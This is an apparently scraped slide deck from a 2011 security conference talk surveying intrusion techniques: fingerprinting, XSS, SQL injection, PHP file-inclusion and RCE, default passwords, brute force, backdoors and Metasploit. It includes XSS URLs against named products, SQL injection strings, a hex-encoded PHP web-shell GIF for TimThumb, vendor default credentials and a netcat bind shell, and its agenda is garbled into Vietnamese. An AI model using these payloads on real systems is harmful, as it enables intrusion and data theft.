Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]

Intrusion Techniques
DcLabs Hacking Tour 2011

Ewerson Guimarães (Crash) DcLabs – HackingTour 2011

chương trình nghị sự
Vân tay
Thất bại ở những nơi
Phía sau cánh cửa
bạo lực
vỏ mã
khai thác
Máy quét


FingerPrint
Grab informations about a target host.
Ex: It's used to identify Operational System and/or
Services(daemon) version number by TCP/IP response's
unique characteristics.

The best tool for discovery operating systems, services,
devices and others: NMAP (Network Mapper)

Basic commands:

nmap host (Basic)
nmap –sV host (Service Versions)
nmap –PN host ( ICMP ECHO-REPLY Ignore)
nmap –O host (Try to grab O.S version)
nmap –f host (Firewall/IDS/IPS Evasion)


Passive - FingerPrint

• TTL - When the operating system sets the Time To Live
on the outbound packet

• Window Size - When the operating system sets the
Window Size at.

• DF - =The operating system set the Don't Fragment bit.

• TOS - The operating system set the Type of Service,
and if so, at what.


FingerPrint
Matrix:


FingerPrint
U. Bourne


FingerPrint
In BackTrack Linux you can find many softwares to
Finger-Print

Http://www.backtrack-linux.com


Web Vulnerability
These vulnerabilities are initially explored through
malicious browser requests compromising the target
in a matter of minutes

Cross Site (XSS) – Reflected / Stored

SQL-Injection

PHP (LFI / RFI/ AFU / RCE)


Web Vulnerability
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages
viewed by other users.

Spekx – Knowledge Base -
http://server/pls/ksp_acesso.login_script?p_time=%221%22%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?
modo=resbusca_biblioteca&pChave=a%22%2F%3E+
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
&Submit=Buscar


Web Vulnerability

Reflected / Stored Xss

DEMO


Web Vulnerability


What is the impact?

Why?

Examples?


Web Vulnerability
SQL-Injection

It occurs when the attacker can insert a series of SQL statements
within a 'query' by manipulating the data entry application.

SELECT campos FROM tabela WHERE campo = 'test@test.com';

Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';

admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a
' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a
" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a
or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--
' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a


SQL-Injection

LIVE DEMO OCOMON
Throwing fudge at the fan


Web Vulnerability
CGI/PHP Command Injection

It occurs when the attacker insert a series of
commands exploiting vulnerable CGI/PHP scripts

OneorZero – AFU + LFI

http://server/oneorzero/index.php?controller=../[FILE].php

WordPress TimThumb (Theme) Plugin – RCE
x47x49x46x38x39x61x01x00x01x00x80x00x00
xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00
x00x2Cx00x00x00x00x01x00x01x00x00x02x02
x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65
x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D
x64x27x5Dx29x3Bx20x3Fx3Ex00


Default/Weak passwords
Default passwords are set by its manufacturers/developers
and were not changed after the installation/configuration.

As supplied by the system vendor and meant to be changed at
installation time (Nobody do this shit)

Ex: Sw 3Com:
User: security - Pass: security

FireBird:
User: sysdba - Pass: masterkey

Weak: Passwords that are easily guessed or in a keyboard
sequential
Ex: 123456 - Love - House´s phone - Birthday - Etc...


Brute Force
It consists in using random combinations of
characters/numbers and symbols, wordlists and/or
string generators to crack a password

Ex:
John the Ripper
Hydra
SSH Brute Force


Brute Force
DirBuster - DirBuster is a multi threaded java application designed
to brute force directories and files names on web/application servers


Exploits
Kinds of Exploits:

Local: Usually, the objective of a local exploit is to elevate
user's privileges on the machine as close as possible to
root (uid=0) or administrator. They are written to exploit
kernel bugs or suid binaries

Remote: It works over a network connection and
exploit the vulnerable target without any prior access to it.

www.securityfocus.com
www.secunia.com
www.exploit-db.com

0Days It works usually an unpublished exploit from a brand
new found vulnerability. You can buy! $$$$$


Exploits

If Kernel was patched?
Will we cry?
Alexos=>


Exploits

No!!!! Fuck him!!!
We have others ways to pwn the box

GNU C library dynamic linker

Suid´s

Etc...


Backdoors/RootKits
Used to maintain access to the system

We can Netcat use for this purpose:
nc –vlp 5555 –e /bin/bash

PHP - ASP - JSP

RootKits

The main purpose of a rootkit is to hide the attacker's presence
replacing vital system binaries from target's system
Example:
Hide files (with match strings)
Run command when match strings
Hide processes
Hide open ports, and others.


Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for
a specific vulnerability (BSQLHacker, SQLMAP) and Generic
which are written for various kinds of vulnerabilities. Generic
scanners use known service banners/strings to locate the
potential target/vulnerabilities

W3af
Nessus


Scanners/Fuzzers


Sniffers
Sniffer monitors and analyzes network traffic. Some of these
packets may contain critical information (such as logins,
passwords and cool infos )
WhireShark -


MetaSploit


MetaSploit

Let´s Fuck Windows?


Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix.
It scans your system for vulnerabilities or problems in
configuration files allowing you to get a quick overview of
the security status of your system.


Questions?


Contact

Crash - crash@dclabs.com.br

Irc: irc.freenode.net #dclabs

twitter: @crashbrz


Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]

Recommandé

Recommandé

Contenu connexe

Dernier

Dernier (20)

En vedette

En vedette (20)

Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]